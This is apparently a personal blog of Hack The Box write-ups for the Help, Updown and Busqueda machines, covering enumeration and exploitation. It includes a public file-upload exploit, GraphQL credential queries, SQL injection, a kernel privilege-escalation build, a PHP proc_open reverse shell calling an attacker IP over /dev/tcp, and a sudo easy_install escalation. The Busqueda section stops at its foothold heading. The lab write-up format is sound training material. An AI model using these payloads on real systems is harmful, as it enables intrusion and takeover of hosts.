Linux on Emil Pawlak

Help

EmilPawlak@protonmail.com (Emil Pawlak) — 18.04.2026

Enumeration

nmap

As usual I start with a nmap scan that runs in the background.

nmap scan results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-18 15:37 CEST
Nmap scan report for 10.129.230.159
Host is up (0.028s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/18%OT=22%CT=1%CU=37591%PV=Y%DS=2%DC=I%G=Y%TM=69E3891
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=108%TI=Z%
OS:CI=Z%II=I%TS=A)SEQ(SP=108%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E2S
OS:T11NW7%O2=M4E2ST11NW7%O3=M4E2NNT11NW7%O4=M4E2ST11NW7%O5=M4E2ST11NW7%O6=M
OS:4E2ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y
OS:%T=40%W=FAF0%O=M4E2NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=
OS:)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.55 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-18 15:37 CEST
Nmap scan report for help.htb (10.129.230.159)
Host is up (0.029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp

Nmap done: 1 IP address (1 host up) scanned in 10.43 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-18 15:37 CEST
Nmap scan report for help.htb (10.129.230.159)
Host is up (0.028s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 1009.37 seconds

I inputted the ip into the browser, it changed into “help.htb” domain so I added it into my /etc/hosts file. Running nmap scan shows that there are 3 ports opened - 22, 80 and 3000. HTTP shows a default apache2 page. Port 3000 shows a JSON file with a message “Hi Shiv, To get access please find the credentials with given query”.

I ran a directory scan on both ports ffuf -u http://help.htb:3000/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt and checked for any subdomains with ffuf -u http://help.htb:3000/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.help.htb" -fs 81.

I found additional subdirectories on port 80:

server-status
javascript
support

I also tried out feroxbuster with feroxbuster -u http://help.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --filter-status 404 --dont-filter command.

ffuf showed me that there is a support directory which hosts helpdeskz, forexbuster also showed me that there is an upload page on it. I looked online and with defaultcreds (creds search helpdesk) but I didn’t find anything for this ticketing dashboard.

Foothold

Searchsploit shows that there is some arbitrary file upload public exploit, I will check it out. I can’t find what version I’m using but this exploit works on helpdeskz’s version 1.0.2 - https://www.exploit-db.com/exploits/40300.

I found this python port of this exploit - https://github.com/trevlee/helpdeskz_exploit

I tested this exploit a few times and looked around other forks of it - there is some nuance to it.

Firstly, you need to provide a “baseUrl” for the exploit. I assumed that “base” url would be “http://help.htb/support" in that case, but that’s not true. When I ran a script I never got any successful hits with it. Then I thought that maybe it expects the form URL with all it’s GET parameters like http://help.htb/support/?v=submit_ticket&action=displayForm but it had an opposite effect - everything was a false-positive.

Then I was reading some fork version of the script and noticed that author was accessing http://help.htb/support/uploads/tickets/ which finally worked.

Another issue was the shell’s file. When I attempted to attach a .php shell or similar the form always thrown out an error. The only format it seemed to accept was .txt which redirected me out. I doubled my extensions like so .php.txt and it seemed to go through but the exploit never saw those shells. Only after I while I randomly tried to catch a failed form with a plain .php extension and it worked. Seems like the form doesn’t really discard those forms - crazy logic error.

azaeir@parrot (~/Desktop/htb/machines/help/helpdeskz_exploit): python3 exploit http://help.htb/support/uploads/tickets/ shell.php 
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
found!
http://help.htb/support/uploads/tickets/bd42427925a14e4cf6e46a11468bc98c.php

I also couldn’t make a reverse shell work so instead I just uploaded a simple php web shell. With it I got access as the help user and got a user flag.

I decided to try the revshell route again and first I got a never before seen error about a detection of a server side request forgery, but after I refreshed it worked.

Account is in some interesting groups uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)

Looking around the filesystem I didn’t find anything interesting besides the help’s directory so I dug deeper into it. In /home/help/help/src I found what looks to be the source of the message from port 3000. It asked me to use a query to look for credentials so I ran grep -rni "pass" . and I found this information

./graphql/schema/resolvers/index.js:1:const user = { username:'helpme@helpme.com', password:'5d3c93182bb20f07b994a7f617e99cff' }
./graphql/schema/types/user.graphql:4: password: String

I tried to use those credentials on the only login form I know so on port 80 but it didn’t work - same goes for ssh.

From what I’m checking it seems like the software on 3000 Express powered by Node.js running GraphQL. GraphQL is the key part here, it allows me to talk to the servers database. Think of this setup like a normal SQL (preferably MySQL) database. To talk with GraphQL you need to call it and request specific data from its entry points and need to follow syntax.

So, I could use BurpSuite or some tools that help with graphql but I decided to use curl here.

The intended way to get this data was likely to query the server with GraphQL. Keeping that MySQL analogy in mind, to first know what databases there are. If a server or a company is big there might be multiple databases, but here there is only one so we can skip this aspect.

After databases, I would like to know what tables are in that database, this can be done with such command:

azaeir@parrot (~): curl -X POST http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{"query":"{ __schema { types { name } } }"}'
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}% 

The important part is in the -d flag. Inside, there is a JSON enveloped GraphQL query which asks the database (__schema) what tables are there ({ types { name } }) inside of it.

Seeing the output I can see a number of “tables”. Schema and default ones are usually prefixed with __. From that output I see a “table” named “Users” and I would like to access it. Problem is, I don’t know the structure inside of it. To enumerate it, I can just the below command. Remember, that the important part is inside the -d flag:

azaeir@parrot (~): curl -X POST http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{"query":"{ __type(name:\"User\") { fields { name } } }"}'
{"data":{"__type":{"fields":[{"name":"username"},{"name":"password"}]}}}% ```

This output shows me, that there is a “username” and “password” column - or an entry point.

Now, knowing what columns I can query, I can search for that with this command:

azaeir@parrot (~): curl -X POST http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{"query":"{ user { username password } }"}'
{"data":{"user":{"username":"helpme@helpme.com","password":"5d3c93182bb20f07b994a7f617e99cff"}}}% 

Anyway, as the message said “To get access please find the credentials” and I got the credentials I need to think for what those creds could be. I already checked the helpdeskz and ssh, but my correct suspicion is that they are likely for the express database itself. Express is however just an HTTP server. It natively doesn’t have a built-in authentication system so my only way in could still be GraphQL queries.

I wanted to authenticate with GraphQL but there looking at my previous output there is no “Mutations” table. Which would be needed for API to accept any credentials in the first place. I though about other possible ways to authenticate to Express and I thought that my password might be in fact an MD5 hash. I ran it though hashcat with -m 0 and to my silly surprise it is. the password in reality is “godhelpmeplz”.

This credentials worked on the helpdeskz platform this time. Inside, I can see a new tab “My Tickets” but it and all other tabs don’t show any new data.

That new tab requires me to input a ticket id and search. Maybe there is like an “IDOR” vulnerability for it. It’s not really an idor but I digress. I opened this site with burp, created a small wordlist with number using for i in {0..10000}; do echo "$i"; done > numbers.txt; and looked for website size difference. There was just one difference for id 0 but it was just another error. I realized that those ids are not simple number but are encoded same as I did in my foothold - #6DA-F2B-8D321 etc.

Privilege Escalation

I remembered when looking for helpdeskz exploits to file upload I stumbled upon SQL injection. I have a feeling that it could be my way into priv-esc. This repo seems like will work. It also mentions the correct version. I followed the steps from the repository I got a few errors like this:

(myvenv) azaeir@parrot (~/Desktop/htb/machines/help/HelpdeskZ-Authenticated-SQL-injection): ./helpdeskz-sql-injection.py "http://help.htb/support/" "helpme@helpme.com" "godhelpmeplz"
(+) Csrfhash: "7a42706d1baa866ce4216464bb815971" .
(+) Ticket link: "http://help.htb/support/?v=view_tickets&action=ticket&param[]=9" .
(-) Failed to fetch the full vulnerable url.
(-) This may be due to an existing ticket's lack
(-) lack of file attachment.
(-) Delete file-less ticket and create one with 
(-) a file attached to it!
(-) Response:
b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 

But it just turned out that I need to create a ticket as an authenticated user. When I ran the above command again I got admin credentials - admin:d318f44739dced66793b1a603028133a76ae680e. Interestingly, this repo seems to be using error based sql injection and from the looks of it, it was created specifically for this box which kinda defeats the purpose of using it.

I ran the admin’s password hash through hashcat, first with just hashcat admin.hash /usr/share/wordlists/rockyou.txt and then hashcat -m 100 admin.hash /usr/share/wordlists/rockyou.txt when I learned that it’s SHA1 - admin:Welcome1.

I use the admin credentials to ssh into the host but it didn’t work, I also tried it on helpdeskz and same results. I used variants with and without the domain to no avail. I decided to run the script again and guess other columns like “email” and “id”. I found an email support@mysite.com but it still doesn’t work.

I took a break and came back with new power. I decided to go over my linux priv-escalation before i run linPEAS.

With uname -a I got information about the linux and with searchsploit 4.4.0-116 I noticed that there is a local privilege escalation vulnerability related to this kernel version.

I found this article that talks about an exploit. I followed the steps mentioned there and just slightly adjusted the recommendations. I download the exploit with searchsploit -m linux/local/44298.c. Then i compile it with gcc -static 44298.c -o exploit.c. -static also compiles the exploit with all libraries it might need. I start a python server python3 -m http.server 1338. Look for a directory where I’m able to download the exploit. I can in cd /tmp. I download the exploit with wget http://10.10.15.189:1338/exploit.c. Make it executable with chmod +x exploit.c. And run ./exploit.c.

With these steps I get a root shell and find the root flag in their home directory.

Closing Thoughts

Help shows a number or niche techniques and pivoting options, it keeps on showing interesting attack vectors but doesn’t become annoying or unnecessary complicated at any point. It’s fun and enjoyable through the whole time. It also has a few ways to be solved which is always fun to try after the initial root. At some points there is an opportunity for some minor rabbit holes - which I of course found - but it was a good reminder to not be afraid to go a few steps back and double-check your notes.

Updown

EmilPawlak@protonmail.com (Emil Pawlak) — 12.04.2026

Enumeration

nmap

I start with a nmap scan which shows that the only ports opened are HTTP, SSH on TCP and DHCP on UDP.

nmap scan results

Nmap scan report for 10.129.227.227
Host is up (0.040s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/9%OT=22%CT=1%CU=34949%PV=Y%DS=2%DC=I%G=Y%TM=69D81DCE
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(
OS:SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=F4%GCD=1%ISR=F8%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=F8%GCD=1
OS:%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E2ST11NW7%O2=M4E2ST11NW7%O3=M4E2NN
OS:T11NW7%O4=M4E2ST11NW7%O5=M4E2ST11NW7%O6=M4E2ST11)WIN(W1=FE88%W2=FE88%W3=
OS:FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M4E2NNSNW7%CC=Y%
OS:Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IP
OS:L=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.58 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 23:44 CEST
Nmap scan report for 10.129.227.227
Host is up (0.028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 11.93 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 23:45 CEST
Nmap scan report for 10.129.227.227
Host is up (0.028s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 1011.77 seconds

HTTP

Looking at the website we can see that it’s conceptually a simple website that checks if another given website is up, or down. Looking around the mechanism normally and through burpsuite I can see that there is a lot of filtering around the input. The most bare down version of a query is “h://t” but any type of injection or inclusion are being caught by the system’s logic.

Now I’ll set up a listener and see if the checker connects - it does. I now created a PHP shell and I’ll see if it executes it. Unfortunately it doesn’t.

I scanned for different subdomains and directories with [[ffuf]] and I found “dev” for both of the scans. It however only shows a 403 - forbidden error.

I started another directory enumeration with ffuf - this time inside /dev and it came I found a “.git” directory. I didn’t think of it as valuable at first, but after some digging and reading it can hold some nice data. I also found this tool named git-dumper which seems it could be useful exactly for that.

Git code review

I tested both manual enumeration and with git-dumper. The second one is in my opinion superior as the tool doesn’t only download and list files from /.git as I expected - it reconstructs the repo itself rebuilding the actual working directory from the git objects.

From the “changelog.txt” I learn that there is an upload option on the website and a plan for a new admin panel. Checking the “checker.php” I found some interesting information about the logic of the website, especially these parts:

# Check if extension is allowed.
	$ext = getExtension($file);
	if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
		die("Extension not allowed!");
	}

# Create directory to upload our file.
	$dir = "uploads/".md5(time())."/";
	if(!is_dir($dir)){
 mkdir($dir, 0770, true);
 }
 
# File size must be less than 10kb.
	if ($_FILES['file']['size'] > 10000) {
 die("File too large!");
 }

Key information:

I know which extensions are not allowed
I know the upload location and the naming convention of the uploaded file too
I know that the file must be smaller than 10 kB.

Now my task is to structure an attack path that will check all of these boxes. Firstly, one php related extension which can execute that I don’t see mentioned in the script is “.phar”. With a reverse shell named “shell.phar” I would need to access it under “http://siteisup.htb/uploads//shell.phar” - let’s see if I’m right.

I create a shell file, the payload itself is from PentestMonkey. I started a python server where my shell resides with azaeir@parrot (~/Desktop/htb/machines/updown): python -m http.server 1338, I requested the shell from the siteisup.htb and got a confirmation that it was successful. This confirmation also contains a timestamp 10.129.227.227 - - [11/Apr/2026 16:51:45] "GET /shell.phar HTTP/1.1" 200 -. I quickly read that the PHP’s time() function uses epoch format. I could’ve ran the function myself, but I found a simple website that converts time dates into epoch. I take my output of “1765462305” and run it against a hash generator and get my hash - here is the process:

11/Apr/2026 16:51:45 - Original
11/Apr/2026 14:51:45 - Converted to UTC
1775919105 - Converted into Epoch
696c4310b51bd75fc8591dca1f24e191 - Hashed with MD5

Sadly - even though it would be a cool technique - this doesn’t work. This could be because of the server using different time or the last function in the script which might automatically delete uploaded files to block this whole attack path.

I decided to step back and carefully read through all the files and try to understand them.

Foothold

Setting up the header

In the .htaccess there is a rule that blocks all traffic unless a request includes the “Special-Dev header set to “only4dev”, which then grants access via an environment flag. Let’s try to access both the normal and the dev. subdomain.

I can’t seem to make it work with burpsuite, I get a time-out, but curl does work curl -H "Special-Dev: only4dev" http://dev.siteisup.htb. To make it work better I found this firefox add-on which made it persistent.

PHP wrappers

At this point I struggled a lot. I got access to the developer which allowed me this time to upload a file with URL addresses to check if they are up or down. I wasn’t able to upload any rev shells or webshell because of the extension limits I saw in the source code. When I accessed the admin page I noticed a “page” get parameter so I decided to look for some PHP filters and attempt LFI but this also failed. While researching PHP filters I stumbled upon the topic of PHP wrappers. In short, PHP wrappers allow PHP to read a bunch of different streams of data. So besides being used with http:// or https:// it can also understand zip://, phar:// and a bunch of more of them. As I wasn’t able to input basic php extensions I wanted to upload a zip file with my rev shell but it didn’t work. I guess partially because of the fact that php was also somewhere in the code mentioned to be black listed, and, also because they might be further filtering for PHP functions rendering most of the shell useless. I decided to create a zip file but change it’s extension to something random, hoping that filtering doesn’t check the magic bytes and run <?php phpinfo(); ?>. To access this file, I decided to try phar as it behaves in a lot of ways like zip data stream but it might’ve not been blocked and to my surprise, this combination worked. http://dev.siteisup.htb/?page=phar://uploads/4eba46216cd35f13b3cd75de77575283/info.az/info.

In phpinfo I can see a big list of disabled function which explains why my shells didn’t work.

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,error_log,system,exec,shell_exec,popen,passthru,link,symlink,syslog,ld,mail,stream_socket_sendto,dl,stream_socket_client,fsockopen

Bypassing filters

I could look through them manually and see if there are any that were not mentioned, but I much more prefer to use dfunc-bypasser. The original dfunc runs on python2 which is deprecated, but I luckily found a python3 fork. When I ran this script it didn’t want to connect to the site, this is likely because of the fact that we need a special header to access it. I made a copy of the tool and looked through it to see if I can add edit the header somewhere in it but I wasn’t able to figure it out. I just decided to cut my losses and examine the list myself. It would be a big waste of time if I started to edit a python script for it to not find any functions.

I wanted to go one-by-one through the functions. Then I thought I could make some short python script/loop that would check phpinfo() output and mark those vulnerable functions and lastly I though “this functionality must be in the dfunc-bypasser itself, right?” Because of that I noticed two easy way to enumerate those functions.

Firstly there is no need to edit the dfunc-bypasser, there is a simple -H flag which worked for me dfunc-bypasser.py --url 'http://dev.siteisup.htb/?page=phar://uploads/9d7e3ad5bd39603e06555b7ab37a490d/info.az/info' -H 'Special-Dev=only4dev'.

Secondly, there is a --file flag which takes a local file of phpinfo so one could dump the data from the website and parse it that way.

Setting up a shell

Finally, I can see that proc_open is a function that is not being filtered.

To exploit this function I started to look for different web shells like this one or this one. I swapped through a bunch of them until I finally found one that worked and didn’t use any forbidden functions:

<?php
$descriptorspec = array(
 0 => array("pipe", "r"), // stdin
 1 => array("pipe", "w"), // stdout
 2 => array("pipe", "w") // stderr
);

$process = proc_open('/bin/bash -c "bash -i >& /dev/tcp/10.10.15.189/1337 0>&1"', $descriptorspec, $pipes);

if (is_resource($process)) {
 fclose($pipes[0]);
 fclose($pipes[1]);
 fclose($pipes[2]);
 proc_close($process);
}
?>

I put it in “procopenshell.php” and zipped it using an arbitrary extension - zip proc.lol procopenshell.php. I started a listener to catch the shell - rlwrap -r nc -lnvp 1337 And soon after I uploaded the file, I access the shell with this URL http://dev.siteisup.htb/?page=phar://uploads/b47622cacd7fde0edbbdcea9c74b7e28/proc.lol/procopenshell

What I found confusing is that I had to specify an extension for procopenshell.php even though the websites logic showed that it will append it itself. Without the extension, shell doesn’t execute. Maybe it’s because the file is in an archive? I guess it just checks the initial archive folder and doesn’t look inside - hard for me to tell.

www-data

Anyway, with this we finally get a shell as a www-data user.

www-data@updown:/home/developer/dev$ ls -la
ls -la
total 32
drwxr-x--- 2 developer www-data 4096 Jun 22 2022 .
drwxr-xr-x 6 developer developer 4096 Aug 30 2022 ..
-rwsr-x--- 1 developer www-data 16928 Jun 22 2022 siteisup

Looking around the machine, I see that there is a user.txt flag located in the developer home directory. I can’t access it, because I lack permissions to read it. In the home directory of that user there is a /dev folder which hosts two files - “siteisup” and “siteisup_text.py”.

Looking at the files I can see that siteisup has a sid as root so this is likely a way to priv-esc.

Looking at siteisup with the strings command I can see that it is related to siteisup_text.py.

Welcome to 'siteisup.htb' application
/usr/bin/python /home/developer/dev/siteisup_test.py

Next step is to read and understand the second script.

import requests

url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
	print "Website is up"
else:
	print "Website is down"

I missed this detail few first times I read the code, but apparently this is a Python2 code and it uses the input() function to get user input which luckily for me also automatically executes code. This function uses eval() in the backend meaning it behaves like eval in all other languages!

First i tried a code injection with __import__('os').system('bash') into siteisup_test.py but it hangs the shell up.
Then, I tried a code injection with __import__('os').system('bash') into siteisup which worked without any issues.

developer

With that, I got a partial access as the developer account. The word partial is important - in reality - I only siteisup tool as the developer, other than that my permissions are still www-data level.

-rw-r----- 1 root developer 33 Apr 12 10:06 user.txt
cat user.txt
cat: user.txt: Permission denied

Luckily, quickly looking around the developer’s home directory I found their id_rsa private key. Which I copied, changed permissions and ran which game me full permissions as that account.

Privilege Escalation

I started my further enumeration with checking if I have any sudo access, turns out that I do.

developer@updown:~$ sudo -l
Matching Defaults entries for developer on localhost:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User developer may run the following commands on localhost:
 (ALL) NOPASSWD: /usr/local/bin/easy_install

I never heard of easy_install, but I googled it and it actually is in GTFOBins.

I simply had to create a fake setup.py holding my bash payload inside, setup a listener on my attacker host, and run the script with sudo.

developer@updown:~$ echo 'import os; os.system("exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty")' >setup.py
developer@updown:~$ cat setup.py
import os; os.system("exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty")
developer@updown:~$ sudo easy_install .

And boom, there is root.

Closing Thoughts

Updown is a really challenging machine very focused on niche web exploitation, solid code review and careful parameter manipulation to actually exploit the attack vectors.

It would be tough not to admit that I struggled at almost every point of this box. I learned a lot of new attack paths and I had to level up my game around code review, web attacks as well as injections and bypasses.

Busqueda

EmilPawlak@protonmail.com (Emil Pawlak) — 06.04.2026

Enumeration

nmap

I ran my nmap scan and found both HTTP and SSH opened. Given that SSH is likely used later and that we don’t have any credentials I checked the website. When i accessed it I noticed that I got a domain name rather than an IP in my URL - searcher.htb - I added it into my /etc/hosts.

nmap scan results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-05 00:09 CEST
Nmap scan report for 10.129.228.217
Host is up (0.028s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/5%OT=22%CT=1%CU=31695%PV=Y%DS=2%DC=I%G=Y%TM=69D18C3B
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)SEQ(
OS:SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=10F%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=107%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=F9%GCD
OS:=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E2ST11NW7%O2=M4E2ST11NW7%O3=M4E2
OS:NNT11NW7%O4=M4E2ST11NW7%O5=M4E2ST11NW7%O6=M4E2ST11)WIN(W1=FE88%W2=FE88%W
OS:3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M4E2NNSNW7%CC=
OS:Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.54 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-05 00:10 CEST
Nmap scan report for 10.129.228.217
Host is up (0.027s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-05 00:10 CEST
Nmap scan report for searcher.htb (10.129.228.217)
Host is up (0.028s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 1008.62 seconds

HTTP

After then I was greeted with a simple website with a form that lets you pick a search engine and look for data with a selected one. In the background I ran ffuf -u https://searcher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt to look for interesting directories and ffuf -u https://searcher.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.searcher.htb" for subdomains. Those results came back empty. There were also no comments in the website code.

Looking into the POST request with BurpSuite I noticed that the request changes depending if we check the “Auto redirect” box. Without the box checked - engine=DuckDuckGo&query=%2Fetc%2Fpasswd With the box checked - engine=DuckDuckGo&query=%2Fetc%2Fpasswd&auto_redirect=

Manual attempts at LFI didn’t work as the website filters / into their encoded %2F. I tried using multiple //, encoding and double-encoding dashes myself and using \ before and after them to confuse the filter, but it didn’t work. I tested for an RFI inputting http://127.0.0.1:80/../../etc/passwd into different parameters without any results.

I also looked through the engines to see if there isn’t a one that could be taken advantage of but I didn’t find such one. Too bad as we can make the server perform requests outside on our behalf and so this seems like such an opportunity for SSRF. I also can’t add custom engines in the POST request itself as it doesn’t go through.

I remembered that I saw IppSec using an SSTI (Server-Side Template Injection) method. SSTI is a vulnerability when user input is injected into a template engine (Flask uses one) to execute a payload as a template code. Template code is used to generate dynamic text like Hello {{username}}! to get Hello Azaeir! and such. I googled and found few payloads, interestingly when I run one of them it changed the response behavior. Weirdly enough engine=DuckDuckGo&query=<SSTI payload> and engine=DuckDuckGo&query=' both give the same empty response. This could be a strong error-based SSTI detection indicator or me just breaking the sites logic.

I tried a lot of different payloads and approaches to influence the template engine to no avail. I noticed that ' symbol is the one that makes the response blank. I was hoping that it was escaping some placeholder, script, or a function but I think even if it does, I can’t seem to take advantage of it.

Foothold

